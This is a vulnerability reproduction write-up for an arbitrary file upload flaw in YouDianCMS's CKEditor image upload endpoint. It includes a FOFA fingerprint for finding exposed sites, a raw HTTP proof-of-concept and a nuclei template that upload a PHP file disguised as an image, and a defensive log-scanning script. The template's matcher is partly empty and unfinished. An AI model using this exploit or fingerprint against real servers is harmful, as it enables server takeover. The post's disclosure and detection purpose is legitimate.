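YouDianCMS (友点) CKEditor Arbitrary File Upload Vulnerability Reproduction
1. Vulnerability Overview
YouDianCMS has an arbitrary file upload vulnerability. An attacker can exploit it to upload malicious files and obtain server privileges.
2. Vulnerability IDs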
CVE | CNVD | CNNVD |
---|---|---|
- | - | - |
3. Affected Versions
Name | Version |
---|---|
- |
4. Search Fingerprint
FOFA: app="友点建站-CMS" && product="友点建站-CMS"
5. POC
```http
POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Content-Length: 185
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: multipart/form-data; boundary=cadc403efc1ad12f5fcce44c172baad2

--cadc403efc1ad12f5fcce44c172baad2
Content-Disposition: form-data; name="files"; filename="c.php"
Content-Type: image/jpg

<?php phpinfo();?>
--cadc403efc1ad12f5fcce44c172baad2--
```
http://127.0.0.1/Public/image/uploads/1709524862134.php
nuclei script
```yaml
id: YouDianCMS-upload
info:
  name: YouDianCMS-upload
  author: test
  severity: info
  description: description
  reference:
    - https://
  tags: tags
http:
  - raw:
      - |
        POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
        Accept-Encoding: gzip, deflate, br
        Accept: */*
        Connection: close
        Content-Type: multipart/form-data; boundary=cadc403efc1ad12f5fcce44c172baad2
        Host: {{Hostname}}
        Content-Length: 179

        --cadc403efc1ad12f5fcce44c172baad2
        Content-Disposition: form-data; name="files"; filename="c.php"
        Content-Type: image/jpg

        <?php phpinfo();?>
        --cadc403efc1ad12f5fcce44c172baad2--
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          -
      - type: status
        status:
          - 200
```
6. Remediation
Update to the latest version.
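For checking whether an instance has already been hit, here is an added example (not part of the original post) that scans web server access logs for the two requests shown in the PoC: a POST to `image_upload.php` and a request for a script file under `/Public/image/uploads/`. The combined log format, the list of executable extensions, and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Paths taken from the PoC request and the uploaded-file URL on this page.
UPLOAD_ENDPOINT = "/public/ckeditor/plugins/multiimage/dialogs/image_upload.php"
UPLOAD_DIR = "/public/image/uploads/"
# Extensions a PHP host may execute (assumed list; adjust to the server's handler config).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(/|$)", re.IGNORECASE)
# Assumes the common/combined access log format.
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                  r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def scan(lines):
    """Return (line_no, client_ip, kind, path) for each suspicious request."""
    findings, uploaders = [], set()
    for no, line in enumerate(lines, 1):
        m = LINE.match(line)
        if not m:
            continue
        # Drop the query string, decode %xx, and compare case-insensitively.
        path = unquote(m["target"].split("?", 1)[0])
        low = path.lower()
        if m["method"] == "POST" and low == UPLOAD_ENDPOINT:
            uploaders.add(m["ip"])
            findings.append((no, m["ip"], "upload-endpoint-post", path))
        elif low.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(low):
            # A script under an image upload directory should never be requested.
            kind = "script-in-upload-dir"
            if m["status"] == "200" and m["ip"] in uploaders:
                kind = "script-served-after-upload"
            findings.append((no, m["ip"], kind, path))
    return findings

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [04/Mar/2024:12:01:02 +0800] "POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [04/Mar/2024:12:01:05 +0800] "GET /Public/image/uploads/1709524862134.php HTTP/1.1" 200 81234 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [04/Mar/2024:12:03:00 +0800] "GET /Public/image/uploads/1709524000000.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [04/Mar/2024:12:04:10 +0800] "GET /Public/image/uploads/a.PHP?x=1 HTTP/1.1" 404 153 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A `script-served-after-upload` finding means the same client uploaded and then received a 200 for a script in the upload directory; treat it as a likely compromise and inspect the file on disk.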
7. References
https://mp.weixin.qq.com/s/oiNffCThHJsfLhePlZjTBA